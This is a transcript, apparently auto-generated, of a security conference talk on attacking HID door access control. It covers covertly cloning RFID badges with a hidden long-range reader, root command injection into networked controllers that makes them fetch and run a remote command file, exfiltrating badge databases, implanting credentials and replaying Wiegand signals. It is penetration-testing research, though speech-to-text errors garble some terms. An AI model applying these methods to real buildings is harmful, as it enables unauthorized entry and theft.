ATTACKING THE HID ACCESS CONTROL SYSTEM - Alex Dib

uh my name is alex steve i'm a security consultant at ncc group uh i specialize in physical security uh you can normally find me on the netsec focus matter most if you uh are on that too today's talk will be about attacking the hid access control system we'll go through um the different types of technologies and the protocols that's being used um we'll go through long-range readers and how to build them and weaponize them uh we'll talk about the encryption on iclass we'll go through um attacking the controller itself we'll go through long-range cloning and then we'll go through a replay attack as a little bonus depending on time we'll go through how we can clone

the new next generation cos credentials this is generally an overview of uh how things work uh there are four main types of technologies that hid use which is your i-class which is a high-frequency uh myfair des fire which is another high frequency and then two low frequencies which is your hid procs and you're in darla procs these are more legacy type cards uh used to be very popular still fairly amount of them in use um today however most things are mostly does fire such as your opal your cards their des fire and your newer style cards that'd be this far as well the next generation stuff is called seos it's actually does not care which type

of credential it uses it's a software based encryption layer that makes it a little bit harder to crack clone so forth generally the way it works is is you present a card to the reader the reader will do its calculations and then send a raw wigan output to the controller and that controller will make a decision whether you have access or not and that controller is normally connected to via rj45 to a computer or access control software at the bottom here you can see this is typically in most environments how they're set up if they're using all hid access control there'll be a server there'll be a brain that will have probably several of these

slave devices connected to it these slave devices are what your actual readers and your door strikes are connecting to and like i said you can have probably about 36 i think daisy chained from off that one brain uh the newer style instances have the all-in-one unit so uh the dual readers will connect to it and the whole controller will be all in that one unit over there uh the wii game protocol i'm not going to go too much into this it's basically just ones and zeroes ones and zeros are transmitted through two wires a green wire and a white wire data zero data one it's basically just transmitting a sequence of ones and zeros uh with uh

corresponding facility code and site code um the way it does depending on which card it is so your your legacy prox card would send 26 bits of ones and zeros to the controller a portion of that bit sequence is a site code and a portion that is facility code now the way you distinction what they really are is basically each building has a site code and each facility code or would be like a card number so uh person a would have one card number and person b would have another card number but the site code would be the same across the building there are different types of formats obviously there's in dollar i class they're different byte sequences and the

way you get the site code and facility code is actually through this little diagram over here we can see where you pull them out um on the top right there you'll see like actual the raw um output from the readers that's being sent to the to the controller sometimes they've got these numbers written down there at the bottom there on the cards themselves so these are long range readers these are mostly designed for car parks garages um saves you from reaching really far out the window from your car so these got long range on them obviously so what we do with them is we weaponize these and um we use these to clone people's credentials so we'll put them

in a backpack whatever whatever it is i'll ask you for directions i'll i'll ask you if i'm in the right place or whatever it may be and i'll secretly be claiming your credential the two on the left are your eye class ones your newer ones the one on the left there this one here is a legacy one and this one here is the new ceos new generation one this one in the middle is in dala that's not commonly used and this one here is probably the most commonly used one right here your legacy prox card the kind of read ranges you get from these things is probably about half a meter pretty decent when you're building these things it's

kind of it's not super technical it's not super hard just a raspberry pi brain we have a logic level converter here just based on for converting the voltages so the reader will give a five volt output and the raspberry pi will want a 3.3 so we just use that to control it so the way it works is the reader will read the card it's dual it's heavy lifting it's decrypts whatever it needs to do and then sends that raw wii gain output that real raw wig weekend output is captured by this raspberry pi um and that raspberry pi allows we can you know just remote in access point in and see all the credentials that we

capture which i'll go into further later um this little device here is called the proxmox this proxmark for those that don't know is like a swiss army knife or rfid cloning basically uh so we'll go into our first card which is your iclass legacy cards these were pretty common up until recently people are starting to convert to the next generation ceos these were actually cracked thanks to some awesome people over here that did some research and pulled out a master key usually there's two kind of keys for these this system uh the first key is a master key which is stored on all hid readers this key is basically the best way i can explain it is to able to read

and write to the card that enables you to read and write to the card the next key is a triple desk key authentication keys these keys are actually used to encrypt decrypt data that's on the card so in order to clone things you need this key in order to decrypt encrypt from the longer range readers you need this key the dump on the right here is what the prox mark gives us think of the card these are all the data blocks on the card what's interesting is that for legacy only the controller only really cares about this row right here block 7. block seven is what contains your site code and your facility code so no matter what you have

in here uh the only thing that's being sent is that block seven data so pay mindful attention to that one um cloning uh hid procs and dial low frequency cards are very trivial there's usually no encryption in there at all so it's basically your site code facility code and then you encode that into a hex and then you clone that hex to a spare card and it's quite trivially easy there's all these tools that you can use that'll be my references here that can convert certain for site codes and facility codes now for those uh that that uh kind of pay attention uh what that means is since the facilities code is the same across the board you can brute force

people's id numbers so if bob has access to the building and alice has access to the server room then i can brute force bob's site code or facility code sorry until i can get the next one that may be alice's authentication we can do that through the proxmox uh yep so as i described the only thing that's being sent is that block 7 data um yeah so what we would do for long range reading is we would uh i think i'm missing a few slides

okay sorry um what we would do for that long range reading is we would capture a credential from the long range reader we would uh the long range reader will do all heavy lifting it would um decrypt everything for us and i'll spit out a basic hex code we'll take that hex code and then we'll write it to a spare card so these are the commands that you use pretty straightforward i'll move on to attacking the long range uh attacking the controller using long range cloning this is a typical output that we would see from the raspberry pi uh the raspberry pi has just a basic web gui you connect to it and as i said here this is the raw

block seven that's unencrypted um that we can then use to convert that into a encrypted version then we can clone to a card uh the output on the right here just shows you basic uh dumps here and this is just the back end of the long range cloning i'll just quickly play a video

okay so what you see here on my bottom right here on the bottom right here you've got a little demo set up that i've set up uh there's basically just a bunch of readers with the controllers and the bottom left here is the long range cloning here so this one here in particular is i class long range i'll take the card or read the card it won't read the card sorry so this card is the one that i want to clone i'll scan it over my long range reader i'll capture the uh raw block 7 data from the the raspberry pi which is there from that i'll take that raw unencrypted block data and then i'll

encrypt it um using the prox mark here with the keys the triple desk keys that'll give me a a block 7 data that i can then use to put on a spare card so with that uh that encrypted block data i'll write to a spare card sometimes it takes a couple times to use it based on frequency and strength and things like that

so that's written successfully i'll use that card now to authenticate to the reader and it's open just like normal so that's essentially how easy it is to clone a um i-class legacy card

so the next attack we have is actually attacking the controllers themselves so let's say you don't have access you don't you're not able to clone someone's card using long range methods there's actually another way to get rce through the controller itself on the network all these controllers broadcast on udp 4070 right so there's an easy way to tell whether a controller is on the network or not it's just udp70 it's it's open and there's a uh there's a function called command blink on and this function is actually vulnerable to command injection due to lack of sanitization of the user input so we can just tack on a backticks and our command and it'll just execute on the system as

root which is awesome so hid provide this tool it's called the hid discovery tool basically what it does is it allows you to locate your controllers on the network and what they've done here is they've shown us the structure of their packet that's being sent which is your command blink on such and such and such mac address so what uh that this tool does is it sends this discover packet to the port on port 4070 and the controller responds back with its information such as its its versioning its mac address and so forth uh what we can do from then on in is actually like i said use the back ticks we can hijack the number of

commands we sent on this last one here and just send a command through it and like i said will run as root concierge is a tool toolkit that mike kelly developed i have since gone and forked it and added a lot more to it uh we'll go through it later however if you want a copy of this just reach out to me later after this talk and i'll give it to you so we'll do a demonstration of opening doors using that script

same setup so what i normally do is i normally run a discover that'll just basically tell me all the controllers on the network using nmap just standard looking for port 4070 so we can see we've got two controllers there um the way the script kind of works is basically i'm hosting a local web server with a command file and the controller will pull that command file execute it and go from there so this particular one what i'll do is i'm sending command to open and then i'm sending command to close it's all done through the script and you can also pick which type of strike you want so door left and right depending on the configuration setup

you can see at the bottom right there that's um that's one two three doors with three requested exit doors so left and right

so what we just did there basically was uh the way it kind of works like i told you we send a we host a basic web server on our local machine with a file of commands in it and then we use this particular command on the controller to w get and execute into shell uh the only thing i sent here was uh query underscore string into an environment variable and then executing it pretty straightforward nothing nothing crazy so the door controllers actually have a local database um so when when they're not connected to the uh the access control software or the server they have they are able to make decisions on their own um and the way they store them is

they basically store a bunch of hex data and two files and these files is uh accessdb and identdb these files have you know permissions when they can and cannot enter if their credentials are saved or not if they have pin numbers if they the actual hex id for them so when when the card is being read it actually does not care about all the encryption and all that kind of stuff it only knows that hex id and whether in this table if it's enabled or not essentially um and you can find these files and in the controller file system pretty easily there's a you know accessdb has a block size of 44. um identdb has a block size

of 28. if you can look here this is just basically an identifier of each credential so zero three zero four zero six that's just identifying a particular credential this number one here just signifies door number one and if you look at the next one here this is the actual hex id which is your site code and your facility code and then you've got your corresponding id over here it's it's quite true trivial um also with pin numbers uh one three three seven obviously um pin numbers you can record these are saved within the controller database locally so since we have rc on the box i'll do a demonstration of exfiltrating the database so we can look at it locally

so running discover packet again want to make sure we're getting what we want we'll send a request to exfiltrate the database same sort of style as the other injection where we host a bunch of commands that commands get executed on the controller what this is essentially doing is it's spinning up another web server or it's copying the files to the web server of the controller and then we're just you know w getting them or curling them or whatever it is so now we have a local copy of the controller and of course this script passes it nicely for us if we wanted to

let's do an implant so again we can implant credentials if we like since we have complete access to the controller

i'm just going to show you here that these don't work these are spare cards that i have and they're different frequencies right so once a high frequency wants a low frequency it does not matter like i said in the controllers they don't care whether it's i class whether it's a prox or whatever it is as long as they get that raw weekend output and it's in their database they'll open the door so here i'm in the script i've put in an implant function that essentially implants the hex ids of those two cards into the controller all these functions will be just serving commands to the controller so now those can those cards will now work because i've implanted them into

the local database of the controller pretty simple

what's also interesting with the controller is we can control the configuration of the readers so um the readers some they can be configured to allow uh pin only card only they can be configured to allow pin and card and you have complete control of this right you can change this on the fly so um on the right here you can see that there's a bunch of rope modes that you can set it to and like the local database it's all just in files on the on the controllers that you can modify yourself this particular one here says this particular reader reader one has a mode of four four is card and pin this one here is two so two would be a

card only and you can tell the pin size as well so another file here called pin readers will tell you the amount of pin number the amount of pin size is for that particular reader so if you want to change that later you can you can you have complete control of it we'll show a demonstration of changing that

so one three three seven that pin number you saw in the database that works this particular reader is actually in um pin end card uh pin or card sorry so it does you can do either all um so that's just showing that they both work as a pin or card these are the files that are on the controller we can then just log into that controller change that file in this particular and i think i change it to pin only if you remember correctly it was i think three year three so three signifies pin only

you have to change on both those files and then you can just uh restart the name whatever you need to reach the service that controls that on the fly and um that basically just actions it so now if i go to put my card it will no longer work it'll only be pin only so i'm only my pin will work that's pin working as expected

the card no longer works bear in mind that the card credential still on the database is still enabled and everything however the configuration of the reader doesn't enable it

so the third attack that we can do is actually a physical type attack it's a replay attack there's a device called the esp rfid tool or if you like the red team alliance guys they have their own tool esp key essentially this hijacks the data zero and data one weekend wires from the reader physically and it intercepts the um that that byte sequence or the bit sequence of the weekend protocol and this has a little kind of gui interface that you can you know just log into remotely so essentially what i would do is i would implant the device i pull the device from the reader off the wall and then i'll implant the raw wig in wise and i'll have my own

power source usually doesn't look this ugly um we we've actually done we've taken the header off this and put a punch down in there and we've removed the other headers and actually sits quite flush within the hid reader so you would never know would take us about 30 seconds i think to pull that reader off the wall and then put those wires in that little device there so we can come back anytime i'll show you a demonstration of how that works and how easy it is that we don't even need to you know clone credentials we don't even need to decrypt things so this is the um the output of that esp rfid tool i've just shown here that

that's a card that it's accepted if you can see the tools right up here i'll put it up here within that gui of the tool there i can see that i've captured a um a bit sequence of the weekend output i can just trivially put that in that little bar there retransmit and i'm just going to open the door very easy and you know hid keep coming out with these new generation encryptions and softwares but the end of the day this royal weekend output is extremely vulnerable so no matter how much you put their new credentials in it's still vulnerable to this and there you can even capture pin numbers so i've got the pin number 1337

again through the gui interface let's put one three three seven re-transmit that bit sequence sent directly to the controller it's opening the door

okay so bonus round um cloning ceos credence like i said to you before the cs credentials are the latest and greatest um they apply a software layered you know encryption uh again that means garbage since at the weekend output is still unencrypted ones and zeros right however there's a new method that's uh not been released yet and that is uh essentially just you can clone these new cios credentials and then put that raw unencrypted data onto a iclass legacy block and the reader will still accept it so long as the reader is in in legacy mode so essentially you've got your new readers they're reading your multi-class readers that i'm sure you guys have seen a bunch

of times uh they look all the same and they're accepting the new cs credentials however during the transition period some of these companies or whatever or multi-tenant buildings they'll have they'll have legacy enabled so which means if if this has the latest and greatest reader and legacy is enabled to it then it's vulnerable why because we can clone legacy stuff but we can't clone the new cr stuff and i'll show you how that works so um if you remember earlier there was two of those i class long range readers the long ones uh the newest one has the ability of reading the cos credential right and that reader does everything we need it to do like i said the reader

does all the heavy lifting at the end of the day is sending those bits sequences so we can calculate that block 7 data from that bit sequence and then rewrite that block data to the legacy card and that legacy card will open the door for us as if it was a cs card the reader the controller does not care what type of card it is if you remember so i'll show you so this is what we get right so from the we gotcha the long range reading we get that raw unencrypted block this card at the top level right here is actually the new ceos card um and from that little unencrypted block right there we take that we uh we

encrypt it into a block that the for the i-class legacy block that can read we write it to that block um here i am dumping the li the legacy card and if you remember the block number seven does not care that's all that matters when it gets sent to the reader so when i present that legacy class card to the to the reader the reader is going to do its you know heavy lifting it's just still going to send that block seven and that block seven to the controller is a ceos card right so controller doesn't know so it will open the door so there's a so if you're running the latest and greatest crs be mindful that if you have

legacy enabled you can still clone them from long range and that's all i have uh if there's any questions let me know yeah so does he shoot these readers with like tamper detection they do how often people check them never

yeah yeah um at the moment is uh broken not released uh private researchers have been looking into it it is broken right now yeah

yeah sure yeah i'll upload on youtube after today yep besides doors what else have you been able with rfid um gun safes mostly uh yeah gun safe pretty much um passports running on uhf right so ultra high frequency not yet no one's researched it yet as far as i know any other questions yep what do you use personally for at work well what do you trust me uh i trust desfire at the moment desk fire is uncrackable um even the new ceo stuff they're using deskfire however like i said their readers are taking all their doing all the heavy lifting for us and then sending that raw weekend output so all your opal cards they're running does

fire right all your credit cards are all does fire they can't be cloned long range and the encryption on them hasn't been cracked yet there might be a bypass researcher i'm working with at the moment however that's not proven yep

good question no idea don't know yeah um yeah don't know yes how long range is long range about half a meter yeah it's you know uh close enough to not be awkward and still capture angels yes i have thank you for asking yes i have um we are looking at bluetooth uh so bluetooth is advertising um these uh readers have bluetooth modules on them right um i don't know what i did yeah they have bluetooth modules on them yet so essentially they're constantly advertising sending advertising packets uh we have capability right now on scanning those three channels of bluetooth and we've used the mobile device to capture those packets at the moment we're reverse engineering the app to see if we can get

encryption keys have them successful so far but it's ongoing yeah so yeah we can sort of capture things but we haven't gone anywhere from there yep so with your implants to the controller the software's gonna overwrite that how often does it kill your implants that's a good question it depends on the software sometimes the software will sometimes it won't sometimes you'll do it sorry sometimes we'll do it every 30 seconds sometimes it will do it every you know half an hour like it all depends on the configuration of the software and also there's no logs by the way so on the controller itself there's no logs so the controls are meant to work online so if you

stopped it from getting updates exactly yep then you're at the mercy of the controller right so cool thanks very much [Applause]